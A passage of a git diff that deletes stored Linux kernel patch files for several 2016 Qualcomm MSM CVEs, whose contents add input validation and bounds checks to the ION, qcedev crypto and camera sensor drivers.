- qcom,ion-heap-type = "SYSTEM";
- };
-
-- qcom,ion-heap@21 {
-- reg = <21>;
-- qcom,ion-heap-type = "SYSTEM_CONTIG";
-- };
--
- qcom,ion-heap@8 { /* CP_MM HEAP */
- compatible = "qcom,msm-ion-reserve";
- reg = <8>;
-diff --git a/drivers/staging/android/ion/ion_heap.c b/drivers/staging/android/ion/ion_heap.c
-index 583774e..3026fbe 100644
---- a/drivers/staging/android/ion/ion_heap.c
-+++ b/drivers/staging/android/ion/ion_heap.c
-@@ -2,7 +2,7 @@
- * drivers/gpu/ion/ion_heap.c
- *
- * Copyright (C) 2011 Google, Inc.
-- * Copyright (c) 2011-2014, The Linux Foundation. All rights reserved.
-+ * Copyright (c) 2011-2016, The Linux Foundation. All rights reserved.
- *
- * This software is licensed under the terms of the GNU General Public
- * License version 2, as published by the Free Software Foundation, and
-@@ -302,8 +302,9 @@ struct ion_heap *ion_heap_create(struct ion_platform_heap *heap_data)
-
- switch (heap_data->type) {
- case ION_HEAP_TYPE_SYSTEM_CONTIG:
-- heap = ion_system_contig_heap_create(heap_data);
-- break;
-+ pr_err("%s: Heap type is disabled: %d\n", __func__,
-+ heap_data->type);
-+ return ERR_PTR(-EINVAL);
- case ION_HEAP_TYPE_SYSTEM:
- heap = ion_system_heap_create(heap_data);
- break;
-@@ -342,7 +343,8 @@ void ion_heap_destroy(struct ion_heap *heap)
-
- switch (heap->type) {
- case ION_HEAP_TYPE_SYSTEM_CONTIG:
-- ion_system_contig_heap_destroy(heap);
-+ pr_err("%s: Heap type is disabled: %d\n", __func__,
-+ heap->type);
- break;
- case ION_HEAP_TYPE_SYSTEM:
- ion_system_heap_destroy(heap);
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-6738/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-6738/ANY/0001.patch
deleted file mode 100644
index a2b9d824..00000000
--- a/Patches/Linux_CVEs/CVE-2016-6738/ANY/0001.patch
+++ /dev/null
@@ -1,104 +0,0 @@
-From a829c54236b455885c3e9c7c77ac528b62045e79 Mon Sep 17 00:00:00 2001
-From: AnilKumar Chimata
-Date: Wed, 31 Aug 2016 14:08:16 +0530
-Subject: qcedev: Validate Source and Destination addresses
-
-Source and Destination addresses passed by user space apps/clients
-are validated independent of type of operation to mitigate kernel
-address space exploitation.
-
-Change-Id: I9ecb0103d7a73eedb2e0d1db1d5613b18dd77e59
-Signed-off-by: AnilKumar Chimata
----
- drivers/crypto/msm/qcedev.c | 68 ++++++++++++++++++++-------------------------
- 1 file changed, 30 insertions(+), 38 deletions(-)
-
-diff --git a/drivers/crypto/msm/qcedev.c b/drivers/crypto/msm/qcedev.c
-index e63f061..1402d3d 100644
---- a/drivers/crypto/msm/qcedev.c
-+++ b/drivers/crypto/msm/qcedev.c
-@@ -1234,44 +1234,6 @@ static int qcedev_vbuf_ablk_cipher(struct qcedev_async_req *areq,
- struct qcedev_cipher_op_req *saved_req;
- struct qcedev_cipher_op_req *creq = &areq->cipher_op_req;
-
-- /* Verify Source Address's */
-- for (i = 0; i < areq->cipher_op_req.entries; i++)
-- if (!access_ok(VERIFY_READ,
-- (void __user *)areq->cipher_op_req.vbuf.src[i].vaddr,
-- areq->cipher_op_req.vbuf.src[i].len))
-- return -EFAULT;
--
-- /* Verify Destination Address's */
-- if (creq->in_place_op != 1) {
-- for (i = 0, total = 0; i < QCEDEV_MAX_BUFFERS; i++) {
-- if ((areq->cipher_op_req.vbuf.dst[i].vaddr != 0) &&
-- (total < creq->data_len)) {
-- if (!access_ok(VERIFY_WRITE,
-- (void __user *)creq->vbuf.dst[i].vaddr,
-- creq->vbuf.dst[i].len)) {
-- pr_err("%s:DST WR_VERIFY err %d=0x%lx\n",
-- __func__, i, (uintptr_t)
-- creq->vbuf.dst[i].vaddr);
-- return -EFAULT;
-- }
-- total += creq->vbuf.dst[i].len;
-- }
-- }
-- } else {
-- for (i = 0, total = 0; i < creq->entries; i++) {
-- if (total < creq->data_len) {
-- if (!access_ok(VERIFY_WRITE,
-- (void __user *)creq->vbuf.src[i].vaddr,
-- creq->vbuf.src[i].len)) {
-- pr_err("%s:SRC WR_VERIFY err %d=0x%lx\n",
-- __func__, i, (uintptr_t)
-- creq->vbuf.src[i].vaddr);
-- return -EFAULT;
-- }
-- total += creq->vbuf.src[i].len;
-- }
-- }
-- }
- total = 0;
-
- if (areq->cipher_op_req.mode == QCEDEV_AES_MODE_CTR)
-@@ -1569,6 +1531,36 @@ static int qcedev_check_cipher_params(struct qcedev_cipher_op_req *req,
- __func__, total, req->data_len);
- goto error;
- }
-+ /* Verify Source Address's */
-+ for (i = 0, total = 0; i < req->entries; i++) {
-+ if (total < req->data_len) {
-+ if (!access_ok(VERIFY_READ,
-+ (void __user *)req->vbuf.src[i].vaddr,
-+ req->vbuf.src[i].len)) {
-+ pr_err("%s:SRC RD_VERIFY err %d=0x%lx\n",
-+ __func__, i, (uintptr_t)
-+ req->vbuf.src[i].vaddr);
-+ goto error;
-+ }
-+ total += req->vbuf.src[i].len;
-+ }
-+ }
-+
-+ /* Verify Destination Address's */
-+ for (i = 0, total = 0; i < QCEDEV_MAX_BUFFERS; i++) {
-+ if ((req->vbuf.dst[i].vaddr != 0) &&
-+ (total < req->data_len)) {
-+ if (!access_ok(VERIFY_WRITE,
-+ (void __user *)req->vbuf.dst[i].vaddr,
-+ req->vbuf.dst[i].len)) {
-+ pr_err("%s:DST WR_VERIFY err %d=0x%lx\n",
-+ __func__, i, (uintptr_t)
-+ req->vbuf.dst[i].vaddr);
-+ goto error;
-+ }
-+ total += req->vbuf.dst[i].len;
-+ }
-+ }
- return 0;
- error:
- return -EINVAL;
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-6739/3.10/0001.patch b/Patches/Linux_CVEs/CVE-2016-6739/3.10/0001.patch
deleted file mode 100644
index b4759408..00000000
--- a/Patches/Linux_CVEs/CVE-2016-6739/3.10/0001.patch
+++ /dev/null
@@ -1,62 +0,0 @@
-From ac8242269094729c464ac042a58603e01427e509 Mon Sep 17 00:00:00 2001
-From: Rajakumar Govindaram
-Date: Thu, 15 Sep 2016 17:09:40 -0700
-Subject: msm: camera: cpp: Validate frame message before manipulating it.
-
-CPP frame message is used to send all frame data
-to Microcontroller. It is sent every frame. CPP kernel
-driver has to add information to it before transfer it.
-The message has to be validated before manipulations.
-If it is not valid the message and corresponding frame
-are discarded.
-
-b/30074605
-CRs-Fixed: 1049826
-
-Change-Id: I3e11ca7f6df4bb0d928512f81f3e3dc40fed791a
-Signed-off-by: Rajakumar Govindaram
----
- .../platform/msm/camera_v2/pproc/cpp/msm_cpp.c | 26 ++++++++++------------
- 1 file changed, 12 insertions(+), 14 deletions(-)
-
-diff --git a/drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.c b/drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.c
-index 964703c..7874cf6 100644
---- a/drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.c
-+++ b/drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.c
-@@ -2184,21 +2184,19 @@ static int msm_cpp_cfg_frame(struct cpp_device *cpp_dev,
- return -EINVAL;
- }
-
-- if (!new_frame->partial_frame_indicator) {
-- if (cpp_frame_msg[new_frame->msg_len - 1] !=
-- MSM_CPP_MSG_ID_TRAILER) {
-- pr_err("Invalid frame message\n");
-- return -EINVAL;
-- }
-+ if (cpp_frame_msg[new_frame->msg_len - 1] !=
-+ MSM_CPP_MSG_ID_TRAILER) {
-+ pr_err("Invalid frame message\n");
-+ return -EINVAL;
-+ }
-
-- if ((stripe_base + new_frame->num_strips * stripe_size + 1) !=
-- new_frame->msg_len) {
-- pr_err("Invalid frame message,len=%d,expected=%d\n",
-- new_frame->msg_len,
-- (stripe_base +
-- new_frame->num_strips * stripe_size + 1));
-- return -EINVAL;
-- }
-+ if ((stripe_base + new_frame->num_strips * stripe_size + 1) !=
-+ new_frame->msg_len) {
-+ pr_err("Invalid frame message,len=%d,expected=%d\n",
-+ new_frame->msg_len,
-+ (stripe_base +
-+ new_frame->num_strips * stripe_size + 1));
-+ return -EINVAL;
- }
-
- if (cpp_dev->iommu_state != CPP_IOMMU_STATE_ATTACHED) {
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-6739/3.18/0002.patch b/Patches/Linux_CVEs/CVE-2016-6739/3.18/0002.patch
deleted file mode 100644
index 139efbc8..00000000
--- a/Patches/Linux_CVEs/CVE-2016-6739/3.18/0002.patch
+++ /dev/null
@@ -1,62 +0,0 @@
-From c4af572a7ad59c0f07fd316a08055bc86dfb5f0d Mon Sep 17 00:00:00 2001
-From: Rajakumar Govindaram
-Date: Thu, 15 Sep 2016 17:09:40 -0700
-Subject: msm: camera: cpp: Validate frame message before manipulating it.
-
-CPP frame message is used to send all frame data
-to Microcontroller. It is sent every frame. CPP kernel
-driver has to add information to it before transfer it.
-The message has to be validated before manipulations.
-If it is not valid the message and corresponding frame
-are discarded.
-
-b/30074605
-CRs-Fixed: 1049826
-
-Change-Id: I3e11ca7f6df4bb0d928512f81f3e3dc40fed791a
-Signed-off-by: Rajakumar Govindaram
----
- .../platform/msm/camera_v2/pproc/cpp/msm_cpp.c | 26 ++++++++++------------
- 1 file changed, 12 insertions(+), 14 deletions(-)
-
-diff --git a/drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.c b/drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.c
-index c0105a8..18a465f 100644
---- a/drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.c
-+++ b/drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.c
-@@ -2251,21 +2251,19 @@ static int msm_cpp_cfg_frame(struct cpp_device *cpp_dev,
- return -EINVAL;
- }
-
-- if (!new_frame->partial_frame_indicator) {
-- if (cpp_frame_msg[new_frame->msg_len - 1] !=
-- MSM_CPP_MSG_ID_TRAILER) {
-- pr_err("Invalid frame message\n");
-- return -EINVAL;
-- }
-+ if (cpp_frame_msg[new_frame->msg_len - 1] !=
-+ MSM_CPP_MSG_ID_TRAILER) {
-+ pr_err("Invalid frame message\n");
-+ return -EINVAL;
-+ }
-
-- if ((stripe_base + new_frame->num_strips * stripe_size + 1) !=
-- new_frame->msg_len) {
-- pr_err("Invalid frame message,len=%d,expected=%d\n",
-- new_frame->msg_len,
-- (stripe_base +
-- new_frame->num_strips * stripe_size + 1));
-- return -EINVAL;
-- }
-+ if ((stripe_base + new_frame->num_strips * stripe_size + 1) !=
-+ new_frame->msg_len) {
-+ pr_err("Invalid frame message,len=%d,expected=%d\n",
-+ new_frame->msg_len,
-+ (stripe_base +
-+ new_frame->num_strips * stripe_size + 1));
-+ return -EINVAL;
- }
-
- if (cpp_dev->iommu_state != CPP_IOMMU_STATE_ATTACHED) {
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-6740/3.10/0001.patch b/Patches/Linux_CVEs/CVE-2016-6740/3.10/0001.patch
deleted file mode 100644
index 0d9e49a9..00000000
--- a/Patches/Linux_CVEs/CVE-2016-6740/3.10/0001.patch
+++ /dev/null
@@ -1,138 +0,0 @@
-From ef78bd62f0c064ae4c827e158d828b2c110ebcdc Mon Sep 17 00:00:00 2001
-From: VijayaKumar T M
-Date: Tue, 6 Sep 2016 12:04:57 +0530
-Subject: msm: sensor: Avoid potential stack overflow
-
-Add a check to validate the user input data is not
-greater than expected stack buffer size to avoid out
-of bounds array accesses
--Fix checkpatch.pl warnings.
-
-CRs-Fixed: 1056307
-Change-Id: I8b31006772367a120828269243b1971d33a4d7d3
-Signed-off-by: VijayaKumar T M
----
- .../platform/msm/camera_v2/sensor/io/msm_camera_cci_i2c.c | 13 ++++++++++++-
- .../platform/msm/camera_v2/sensor/io/msm_camera_qup_i2c.c | 13 ++++++++++++-
- 2 files changed, 24 insertions(+), 2 deletions(-)
-
-diff --git a/drivers/media/platform/msm/camera_v2/sensor/io/msm_camera_cci_i2c.c b/drivers/media/platform/msm/camera_v2/sensor/io/msm_camera_cci_i2c.c
-index 07b7e32..c0ac738 100644
---- a/drivers/media/platform/msm/camera_v2/sensor/io/msm_camera_cci_i2c.c
-+++ b/drivers/media/platform/msm/camera_v2/sensor/io/msm_camera_cci_i2c.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2011-2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2011-2016, The Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -361,6 +361,12 @@ int32_t msm_camera_cci_i2c_write_seq_table(
- client_addr_type = client->addr_type;
- client->addr_type = write_setting->addr_type;
-
-+ if (reg_setting->reg_data_size > I2C_SEQ_REG_DATA_MAX) {
-+ pr_err("%s: number of bytes %u exceeding the max supported %d\n",
-+ __func__, reg_setting->reg_data_size, I2C_SEQ_REG_DATA_MAX);
-+ return rc;
-+ }
-+
- for (i = 0; i < write_setting->size; i++) {
- rc = msm_camera_cci_i2c_write_seq(client, reg_setting->reg_addr,
- reg_setting->reg_data, reg_setting->reg_data_size);
-@@ -418,6 +424,7 @@ static int32_t msm_camera_cci_i2c_compare(struct msm_camera_i2c_client *client,
- int32_t rc;
- uint16_t reg_data = 0;
- int data_len = 0;
-+
- switch (data_type) {
- case MSM_CAMERA_I2C_BYTE_DATA:
- case MSM_CAMERA_I2C_WORD_DATA:
-@@ -472,6 +479,7 @@ int32_t msm_camera_cci_i2c_poll(struct msm_camera_i2c_client *client,
- enum msm_camera_i2c_data_type data_type)
- {
- int32_t rc;
-+
- S_I2C_DBG("%s: addr: 0x%x data: 0x%x dt: %d\n",
- __func__, addr, data, data_type);
-
-@@ -515,6 +523,7 @@ static int32_t msm_camera_cci_i2c_set_write_mask_data(
- {
- int32_t rc;
- uint16_t reg_data;
-+
- CDBG("%s\n", __func__);
- if (mask == -1)
- return 0;
-@@ -544,8 +553,10 @@ int32_t msm_camera_cci_i2c_write_conf_tbl(
- {
- int i;
- int32_t rc = -EFAULT;
-+
- for (i = 0; i < size; i++) {
- enum msm_camera_i2c_data_type dt;
-+
- if (reg_conf_tbl->cmd_type == MSM_CAMERA_I2C_CMD_POLL) {
- rc = msm_camera_cci_i2c_poll(client,
- reg_conf_tbl->reg_addr,
-diff --git a/drivers/media/platform/msm/camera_v2/sensor/io/msm_camera_qup_i2c.c b/drivers/media/platform/msm/camera_v2/sensor/io/msm_camera_qup_i2c.c
-index ee0e9ba..2c606cc3 100644
---- a/drivers/media/platform/msm/camera_v2/sensor/io/msm_camera_qup_i2c.c
-+++ b/drivers/media/platform/msm/camera_v2/sensor/io/msm_camera_qup_i2c.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2011, 2013-2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2011, 2013-2016, The Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -505,6 +505,12 @@ int32_t msm_camera_qup_i2c_write_seq_table(struct msm_camera_i2c_client *client,
- client_addr_type = client->addr_type;
- client->addr_type = write_setting->addr_type;
-
-+ if (reg_setting->reg_data_size > I2C_SEQ_REG_DATA_MAX) {
-+ pr_err("%s: number of bytes %u exceeding the max supported %d\n",
-+ __func__, reg_setting->reg_data_size, I2C_SEQ_REG_DATA_MAX);
-+ return rc;
-+ }
-+
- for (i = 0; i < write_setting->size; i++) {
- rc = msm_camera_qup_i2c_write_seq(client, reg_setting->reg_addr,
- reg_setting->reg_data, reg_setting->reg_data_size);
-@@ -560,6 +566,7 @@ static int32_t msm_camera_qup_i2c_compare(struct msm_camera_i2c_client *client,
- int32_t rc;
- uint16_t reg_data = 0;
- int data_len = 0;
-+
- switch (data_type) {
- case MSM_CAMERA_I2C_BYTE_DATA:
- case MSM_CAMERA_I2C_WORD_DATA:
-@@ -615,6 +622,7 @@ int32_t msm_camera_qup_i2c_poll(struct msm_camera_i2c_client *client,
- {
- int32_t rc;
- int i;
-+
- S_I2C_DBG("%s: addr: 0x%x data: 0x%x dt: %d\n",
- __func__, addr, data, data_type);
-
-@@ -663,6 +671,7 @@ static int32_t msm_camera_qup_i2c_set_write_mask_data(
- {
- int32_t rc;
- uint16_t reg_data;
-+
- CDBG("%s\n", __func__);
- if (mask == -1)
- return 0;
-@@ -693,9 +702,11 @@ int32_t msm_camera_qup_i2c_write_conf_tbl(
- {
- int i;
- int32_t rc = -EFAULT;
-+
- pr_err("%s, E. ", __func__);
- for (i = 0; i < size; i++) {
- enum msm_camera_i2c_data_type dt;
-+
- if (reg_conf_tbl->cmd_type == MSM_CAMERA_I2C_CMD_POLL) {
- rc = msm_camera_qup_i2c_poll(client,
- reg_conf_tbl->reg_addr,
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-6740/3.18/0002.patch b/Patches/Linux_CVEs/CVE-2016-6740/3.18/0002.patch
deleted file mode 100644
index 051bfc56..00000000
--- a/Patches/Linux_CVEs/CVE-2016-6740/3.18/0002.patch
+++ /dev/null
@@ -1,54 +0,0 @@
-From a939a87f0adf91feceb329a5c080b86e1ee333c7 Mon Sep 17 00:00:00 2001
-From: Samyukta Mogily
-Date: Thu, 1 Sep 2016 18:16:50 +0530
-Subject: msm: sensor: Avoid potential stack overflow
-
-Add a check to validate the user input data is not
-greater than expected stack buffer size to avoid out
-of bounds array accesses
-
-CRs-Fixed: 1056307
-Change-Id: Ifd1f4e828373535fdf963aad22b217ae880c778c
-Signed-off-by: Samyukta Mogily
----
- drivers/media/platform/msm/camera_v2/sensor/io/msm_camera_cci_i2c.c | 6 ++++++
- drivers/media/platform/msm/camera_v2/sensor/io/msm_camera_qup_i2c.c | 6 ++++++
- 2 files changed, 12 insertions(+)
-
-diff --git a/drivers/media/platform/msm/camera_v2/sensor/io/msm_camera_cci_i2c.c b/drivers/media/platform/msm/camera_v2/sensor/io/msm_camera_cci_i2c.c
-index 7315327..99d4b654 100644
---- a/drivers/media/platform/msm/camera_v2/sensor/io/msm_camera_cci_i2c.c
-+++ b/drivers/media/platform/msm/camera_v2/sensor/io/msm_camera_cci_i2c.c
-@@ -272,6 +272,12 @@ int32_t msm_camera_cci_i2c_write_seq_table(
- client_addr_type = client->addr_type;
- client->addr_type = write_setting->addr_type;
-
-+ if (reg_setting->reg_data_size > I2C_SEQ_REG_DATA_MAX) {
-+ pr_err("%s: number of bytes %u exceeding the max supported %d\n",
-+ __func__, reg_setting->reg_data_size, I2C_SEQ_REG_DATA_MAX);
-+ return rc;
-+ }
-+
- for (i = 0; i < write_setting->size; i++) {
- rc = msm_camera_cci_i2c_write_seq(client, reg_setting->reg_addr,
- reg_setting->reg_data, reg_setting->reg_data_size);
-diff --git a/drivers/media/platform/msm/camera_v2/sensor/io/msm_camera_qup_i2c.c b/drivers/media/platform/msm/camera_v2/sensor/io/msm_camera_qup_i2c.c
-index f542ec2..eced0ce 100644
---- a/drivers/media/platform/msm/camera_v2/sensor/io/msm_camera_qup_i2c.c
-+++ b/drivers/media/platform/msm/camera_v2/sensor/io/msm_camera_qup_i2c.c
-@@ -290,6 +290,12 @@ int32_t msm_camera_qup_i2c_write_seq_table(struct msm_camera_i2c_client *client,
- client_addr_type = client->addr_type;
- client->addr_type = write_setting->addr_type;
-
-+ if (reg_setting->reg_data_size > I2C_SEQ_REG_DATA_MAX) {
-+ pr_err("%s: number of bytes %u exceeding the max supported %d\n",
-+ __func__, reg_setting->reg_data_size, I2C_SEQ_REG_DATA_MAX);
-+ return rc;
-+ }
-+
- for (i = 0; i < write_setting->size; i++) {
- rc = msm_camera_qup_i2c_write_seq(client, reg_setting->reg_addr,
- reg_setting->reg_data, reg_setting->reg_data_size);
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-6741/3.10/0001.patch b/Patches/Linux_CVEs/CVE-2016-6741/3.10/0001.patch
deleted file mode 100644
index 48b2979e..00000000
--- a/Patches/Linux_CVEs/CVE-2016-6741/3.10/0001.patch
+++ /dev/null
@@ -1,137 +0,0 @@
-From 80a1d9978c11f76bbe6d2e622bf2ded18f27e34f Mon Sep 17 00:00:00 2001
-From: VijayaKumar T M
-Date: Wed, 7 Sep 2016 12:53:43 +0530
-Subject: msm: camera: Restructure data handling to be more robust
-
-Use dynamic array allocation instead of static array to
-prevent stack overflow.
-User-supplied number of bytes may result in integer overflow.
-To fix this we check that the num_byte isn't above 8K size.
-
-CRs-Fixed: 1060554
-Change-Id: I9b05b846e5cc3a62b1a0a67be529f09abc764796
-Signed-off-by: VijayaKumar T M
----
- .../msm/camera_v2/sensor/io/msm_camera_cci_i2c.c | 6 ++++
- .../msm/camera_v2/sensor/io/msm_camera_qup_i2c.c | 39 ++++++++++++++++++++--
- 2 files changed, 43 insertions(+), 2 deletions(-)
-
-diff --git a/drivers/media/platform/msm/camera_v2/sensor/io/msm_camera_cci_i2c.c b/drivers/media/platform/msm/camera_v2/sensor/io/msm_camera_cci_i2c.c
-index 07b7e32..f970233 100644
---- a/drivers/media/platform/msm/camera_v2/sensor/io/msm_camera_cci_i2c.c
-+++ b/drivers/media/platform/msm/camera_v2/sensor/io/msm_camera_cci_i2c.c
-@@ -71,6 +71,12 @@ int32_t msm_camera_cci_i2c_read_seq(struct msm_camera_i2c_client *client,
- || num_byte == 0)
- return rc;
-
-+ if (num_byte > I2C_REG_DATA_MAX) {
-+ pr_err("%s: Error num_byte:0x%x exceeds 8K max supported:0x%x\n",
-+ __func__, num_byte, I2C_REG_DATA_MAX);
-+ return rc;
-+ }
-+
- buf = kzalloc(num_byte, GFP_KERNEL);
- if (!buf) {
- pr_err("%s:%d no memory\n", __func__, __LINE__);
-diff --git a/drivers/media/platform/msm/camera_v2/sensor/io/msm_camera_qup_i2c.c b/drivers/media/platform/msm/camera_v2/sensor/io/msm_camera_qup_i2c.c
-index ee0e9ba..5fd11eb 100644
---- a/drivers/media/platform/msm/camera_v2/sensor/io/msm_camera_qup_i2c.c
-+++ b/drivers/media/platform/msm/camera_v2/sensor/io/msm_camera_qup_i2c.c
-@@ -102,7 +102,7 @@ int32_t msm_camera_qup_i2c_read(struct msm_camera_i2c_client *client,
- enum msm_camera_i2c_data_type data_type)
- {
- int32_t rc = -EFAULT;
-- unsigned char buf[client->addr_type+data_type];
-+ unsigned char *buf = NULL;
-
- if ((client->addr_type != MSM_CAMERA_I2C_BYTE_ADDR
- && client->addr_type != MSM_CAMERA_I2C_WORD_ADDR)
-@@ -110,6 +110,17 @@ int32_t msm_camera_qup_i2c_read(struct msm_camera_i2c_client *client,
- && data_type != MSM_CAMERA_I2C_WORD_DATA))
- return rc;
-
-+ if (client->addr_type > UINT_MAX - data_type) {
-+ pr_err("%s: integer overflow prevented\n", __func__);
-+ return rc;
-+ }
-+
-+ buf = kzalloc(client->addr_type+data_type, GFP_KERNEL);
-+ if (!buf) {
-+ pr_err("%s:%d no memory\n", __func__, __LINE__);
-+ return -ENOMEM;
-+ }
-+
- if (client->addr_type == MSM_CAMERA_I2C_BYTE_ADDR) {
- buf[0] = addr;
- } else if (client->addr_type == MSM_CAMERA_I2C_WORD_ADDR) {
-@@ -119,6 +130,8 @@ int32_t msm_camera_qup_i2c_read(struct msm_camera_i2c_client *client,
- rc = msm_camera_qup_i2c_rxdata(client, buf, data_type);
- if (rc < 0) {
- S_I2C_DBG("%s fail\n", __func__);
-+ kfree(buf);
-+ buf = NULL;
- return rc;
- }
-
-@@ -128,6 +141,8 @@ int32_t msm_camera_qup_i2c_read(struct msm_camera_i2c_client *client,
- *data = buf[0] << 8 | buf[1];
-
- S_I2C_DBG("%s addr = 0x%x data: 0x%x\n", __func__, addr, *data);
-+ kfree(buf);
-+ buf = NULL;
- return rc;
- }
-
-@@ -135,7 +150,7 @@ int32_t msm_camera_qup_i2c_read_seq(struct msm_camera_i2c_client *client,
- uint32_t addr, uint8_t *data, uint32_t num_byte)
- {
- int32_t rc = -EFAULT;
-- unsigned char buf[client->addr_type+num_byte];
-+ unsigned char *buf = NULL;
- int i;
-
- if ((client->addr_type != MSM_CAMERA_I2C_BYTE_ADDR
-@@ -143,6 +158,22 @@ int32_t msm_camera_qup_i2c_read_seq(struct msm_camera_i2c_client *client,
- || num_byte == 0)
- return rc;
-
-+ if (num_byte > I2C_REG_DATA_MAX) {
-+ pr_err("%s: Error num_byte:0x%x exceeds 8K max supported:0x%x\n",
-+ __func__, num_byte, I2C_REG_DATA_MAX);
-+ return rc;
-+ }
-+ if (client->addr_type > UINT_MAX - num_byte) {
-+ pr_err("%s: integer overflow prevented\n", __func__);
-+ return rc;
-+ }
-+
-+ buf = kzalloc(client->addr_type+num_byte, GFP_KERNEL);
-+ if (!buf) {
-+ pr_err("%s:%d no memory\n", __func__, __LINE__);
-+ return -ENOMEM;
-+ }
-+
- if (client->addr_type == MSM_CAMERA_I2C_BYTE_ADDR) {
- buf[0] = addr;
- } else if (client->addr_type == MSM_CAMERA_I2C_WORD_ADDR) {
-@@ -152,6 +183,8 @@ int32_t msm_camera_qup_i2c_read_seq(struct msm_camera_i2c_client *client,
- rc = msm_camera_qup_i2c_rxdata(client, buf, num_byte);
- if (rc < 0) {
- S_I2C_DBG("%s fail\n", __func__);
-+ kfree(buf);
-+ buf = NULL;
- return rc;
- }
-
-@@ -161,6 +194,8 @@ int32_t msm_camera_qup_i2c_read_seq(struct msm_camera_i2c_client *client,
- S_I2C_DBG("Byte %d: 0x%x\n", i, buf[i]);
- S_I2C_DBG("Data: 0x%x\n", data[i]);
- }
-+ kfree(buf);
-+ buf = NULL;
- return rc;
- }
-
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-6741/3.18/0002.patch b/Patches/Linux_CVEs/CVE-2016-6741/3.18/0002.patch
deleted file mode 100644
index bab8e7f4..00000000
--- a/Patches/Linux_CVEs/CVE-2016-6741/3.18/0002.patch
+++ /dev/null
@@ -1,137 +0,0 @@
-From d291eebd8e43bba3229ae7ef9146a132894dc293 Mon Sep 17 00:00:00 2001
-From: Samyukta Mogily
-Date: Thu, 8 Sep 2016 17:35:52 +0530
-Subject: msm: camera: Restructure data handling to be more robust
-
-Use dynamic array allocation instead of static array to
-prevent stack overflow.
-User-supplied number of bytes may result in integer overflow.
-To fix this we check that the num_byte isn't above 8K size.
-
-CRs-Fixed: 1060554
-Change-Id: I407b5ec8cdc2ac7f3b491644418d3eb1101ce65a
-Signed-off-by: Samyukta Mogily
----
- .../msm/camera_v2/sensor/io/msm_camera_cci_i2c.c | 6 ++++
- .../msm/camera_v2/sensor/io/msm_camera_qup_i2c.c | 39 ++++++++++++++++++++--
- 2 files changed, 43 insertions(+), 2 deletions(-)
-
-diff --git a/drivers/media/platform/msm/camera_v2/sensor/io/msm_camera_cci_i2c.c b/drivers/media/platform/msm/camera_v2/sensor/io/msm_camera_cci_i2c.c
-index a4ee504..27d4f5e 100644
---- a/drivers/media/platform/msm/camera_v2/sensor/io/msm_camera_cci_i2c.c
-+++ b/drivers/media/platform/msm/camera_v2/sensor/io/msm_camera_cci_i2c.c
-@@ -69,6 +69,12 @@ int32_t msm_camera_cci_i2c_read_seq(struct msm_camera_i2c_client *client,
- || num_byte == 0)
- return rc;
-
-+ if (num_byte > I2C_REG_DATA_MAX) {
-+ pr_err("%s: Error num_byte:0x%x exceeds 8K max supported:0x%x\n",
-+ __func__, num_byte, I2C_REG_DATA_MAX);
-+ return rc;
-+ }
-+
- buf = kzalloc(num_byte, GFP_KERNEL);
- if (!buf) {
- pr_err("%s:%d no memory\n", __func__, __LINE__);
-diff --git a/drivers/media/platform/msm/camera_v2/sensor/io/msm_camera_qup_i2c.c b/drivers/media/platform/msm/camera_v2/sensor/io/msm_camera_qup_i2c.c
-index 7a0fb97..7d21866 100644
---- a/drivers/media/platform/msm/camera_v2/sensor/io/msm_camera_qup_i2c.c
-+++ b/drivers/media/platform/msm/camera_v2/sensor/io/msm_camera_qup_i2c.c
-@@ -73,7 +73,7 @@ int32_t msm_camera_qup_i2c_read(struct msm_camera_i2c_client *client,
- enum msm_camera_i2c_data_type data_type)
- {
- int32_t rc = -EFAULT;
-- unsigned char buf[client->addr_type+data_type];
-+ unsigned char *buf = NULL;
-
- if ((client->addr_type != MSM_CAMERA_I2C_BYTE_ADDR
- && client->addr_type != MSM_CAMERA_I2C_WORD_ADDR)
-@@ -81,6 +81,17 @@ int32_t msm_camera_qup_i2c_read(struct msm_camera_i2c_client *client,
- && data_type != MSM_CAMERA_I2C_WORD_DATA))
- return rc;
-
-+ if (client->addr_type > UINT_MAX - data_type) {
-+ pr_err("%s: integer overflow prevented\n", __func__);
-+ return rc;
-+ }
-+
-+ buf = kzalloc(client->addr_type+data_type, GFP_KERNEL);
-+ if (!buf) {
-+ pr_err("%s:%d no memory\n", __func__, __LINE__);
-+ return -ENOMEM;
-+ }
-+
- if (client->addr_type == MSM_CAMERA_I2C_BYTE_ADDR) {
- buf[0] = addr;
- } else if (client->addr_type == MSM_CAMERA_I2C_WORD_ADDR) {
-@@ -90,6 +101,8 @@ int32_t msm_camera_qup_i2c_read(struct msm_camera_i2c_client *client,
- rc = msm_camera_qup_i2c_rxdata(client, buf, data_type);
- if (rc < 0) {
- S_I2C_DBG("%s fail\n", __func__);
-+ kfree(buf);
-+ buf = NULL;
- return rc;
- }
-
-@@ -99,6 +112,8 @@ int32_t msm_camera_qup_i2c_read(struct msm_camera_i2c_client *client,
- *data = buf[0] << 8 | buf[1];
-
- S_I2C_DBG("%s addr = 0x%x data: 0x%x\n", __func__, addr, *data);
-+ kfree(buf);
-+ buf = NULL;
- return rc;
- }
-
